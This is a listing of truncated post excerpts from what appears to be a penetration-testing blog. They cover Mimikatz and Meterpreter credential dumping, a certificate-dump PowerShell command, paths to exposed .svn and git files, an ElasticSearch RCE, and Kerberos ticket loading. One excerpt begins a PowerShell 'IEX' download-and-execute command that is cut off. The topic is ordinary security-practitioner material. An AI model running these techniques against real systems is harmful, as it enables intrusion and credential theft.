MSF's Mimikatz doesnt work on Windows 8.1 what can you do?
So you are on a Windows 8.1 box. You go to run the trusty mimikatz-->wdigest and it fails. Well, technically it will work, but there won't be anything there. Using the current mimikatz that ships with...
MSF's + Mimikatz + Windows 8.1 part two
I love twitter. OJ replied to me about my metasploit+mimikatz+Windows 8.1 post. Looks like mimikatz 2.0 IS in msf, it's just under the use kiwi functionality: meterpreter > use kiwi Loading extension...
My GoldDigger Script
A while back I created a post module that would index various types of file types so I could more quickly find and decide if I wanted to download potentially useful files. I like to look for the...
Powershell dumping all certs in the cert store
Put this on twitter, just posting it here so I can find it later. You can use powershell to list all the certificates on a host: powershell -Command Get-ChildItem -Recurse Cert: > certs.txt If you are...
Running PowerShell Scripts That Require Module Imports With Meterpreter
Old post on the subject here: http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html More recent posts on the subject by...
DevOoops: Revision Control (Subversion)
Subversion 1.6 (and earlier): Check for .entries files. Walk svn chain to retrieve source. Example: http://somedomain.com/.svn/text-base/index.php.svn-base http://somedomain.com/.svn/entries Metasploit...
ISTS12 Thoughts, Notes, Feedback, Braindump -- Airport Edition
--Airport Edition-- Was asked to play on the Red Team for ISTS 12 at Rochester Institute of Technology. The ISTS event runs similarly to the CCDC events, except they allow teams to attack each other for...
PowerShell-AD-Recon by PyroTek3
Found a couple of fun PowerShell enumeration scripts here: https://github.com/PyroTek3/PowerShell-AD-Recon C:\temp>powershell -exec bypass -Command "IEX (New-Object...
ElasticSearch CVE-2015-1427 RCE Exploit
References: https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/ https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/ http://www.theregister.co.uk/...
Metasploit and MSGRPC
I wanted to automate connecting to MSGRPC. I did find a few older tutorials on the...
DevOoops: Revision Control (git)
Exposed git resources are probably the most gruesome low2pwned issues out there right now. Leaving this exposed allows an attacker to potentially download the full source of the site along with any other...
Running System Commands Against Multiple SSH Servers With Metasploit
Want: To run a command against multiple SSH servers and you want to use metasploit to do it. How: There doesn't exist a multi_ssh_exec type aux module to run commands. Luckily, the ssh_login module...
Running System Commands Against Multiple SSH Servers with Fabric
Fabric is a python library to automate tasks. As the README says: Fabric is a Python (2.5-2.7) library and command-line tool for streamlining the use of SSH for application deployment or systems...
Lets Call Stunt Hacking What it is, Media Whoring.
Lets Call Stunt Hacking What it is, Media Whoring. By Valsmith. I recently read this article:...
Answers on how to get started in Security
I got hit up on twitter and email about how to get started in security by someone. The question was pretty generic and since I didn't even receive a thanks back from the guy I'm sharing it with...
Answers to Questions from the nVisium SecCasts Panel
I was asked to be on a panel for nVisium's SecCasts. Our episode should be out next week, so spoiler alert... my answers are below: If readers/friends/community want additional details on something...
Hard to Sprint When You Have Two Broken Legs
Today I saw this article: White House Tells Agencies to Tighten Up Cyber Defenses Immediately. Now as a disclaimer, I don't work for the government so there is a lot I don't know but I have friends who...
Metasploit + VHOSTS in mass
Maybe this was a solved problem but I couldn't find a solution online. Problem #1: Metasploit RHOSTS takes the file parameter so you can pass in a list of ip ranges. It will also take hostnames as long...
DevOps Days DC 2015 Talk Video
Here is a good copy of Ken's and my DevOps Days DC talk: "DevOops & How I hacked you" DevOpsDays DC 2015 - 30 - DevOops & How I hacked you - Chris Gates, Facebook & Ken Johnson, nVisium from...
Ways To Load Kerberos Tickets
Everyone is aware of the awesomeness that Mimikatz is and most likely golden tickets. Mimikatz ships with lots of kerberos functionality. Just wanted to jot down some quick notes on using these...